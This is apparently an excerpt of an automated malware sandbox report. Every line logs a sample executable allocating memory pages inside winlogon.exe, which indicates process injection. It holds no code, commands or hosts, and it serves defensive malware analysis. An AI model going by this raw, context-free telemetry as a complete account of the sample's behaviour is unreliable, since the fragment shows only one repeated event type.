Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFF2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D001000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D012000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D014000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D016000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D021000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D032000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D034000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D036000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D041000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D052000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D054000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D056000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D061000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D072000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D074000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D076000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D081000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D092000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D094000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D096000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0B2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0D2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0F2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D101000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D112000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D114000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D116000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D121000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D132000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D134000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D136000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D141000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D152000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D154000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D156000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D161000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D172000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D174000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D176000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D181000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D192000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D194000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D196000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1B2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1D2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1F2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D201000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D212000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D214000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D216000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D221000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D232000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D234000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D236000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D241000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D252000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D254000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D256000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D261000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D272000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D274000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D276000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D281000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D292000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D294000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D296000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2B2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2D2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2F2000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D301000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D312000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D314000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D316000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D321000 protect: page read and write
